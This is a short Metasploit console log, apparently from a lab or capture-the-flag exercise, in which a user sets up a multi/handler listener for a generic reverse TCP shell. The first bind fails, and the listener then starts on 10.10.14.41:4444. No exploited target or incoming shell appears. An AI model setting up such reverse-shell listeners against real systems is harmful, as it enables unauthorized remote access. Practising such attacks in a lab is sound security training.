







msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 10.129.128.62
lhost => 10.129.128.62
msf6 exploit(multi/handler) > run

[-] Handler failed to bind to 10.129.128.62:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/handler) > set lhost 10.10.14.41
lhost => 10.10.14.41
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.41:4444 











